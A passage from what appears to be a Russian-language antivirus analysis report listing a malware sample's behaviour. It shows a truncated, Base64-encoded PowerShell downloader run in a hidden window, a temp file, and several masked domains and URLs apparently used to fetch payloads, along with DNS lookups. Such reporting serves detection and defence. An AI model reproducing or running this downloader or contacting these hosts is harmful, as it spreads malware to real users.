Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\793982.cvr
- 'te###sign.com':80
- 'xa####digital.com':80
- 'hu###omains.com':443
- 'li######.fischertrust.org':443
- 'cr####vityonline.fr':80
- 'ba#####cityjewel.com':443
- 'de##ine.com':443
- http://te###sign.com/stats/0W/
- http://xa####digital.com/condosdominicano.biz/50sWkJ/
- http://cr####vityonline.fr/aideadomicile-goderville/jcUzC/
- 'hu###omains.com':443
- 'ba#####cityjewel.com':443
- 'de##ine.com':443
- DNS ASK te###sign.com
- DNS ASK vi##-all.ch
- DNS ASK xa####digital.com
- DNS ASK hu###omains.com
- DNS ASK li######.fischertrust.org
- DNS ASK cr####vityonline.fr
- DNS ASK ba#####cityjewel.com
- DNS ASK de##ine.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADEAaABqADcAXwByAD0AKAAoACcARQAnACsAJwA5AGIAJwApACsAKAAnADcAdAAnACsAJwB4ACcAKQArACcAcwAnACkAOwAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFQARQBNAHAAXABXAG8AcgBEAF... (со скрытым окном)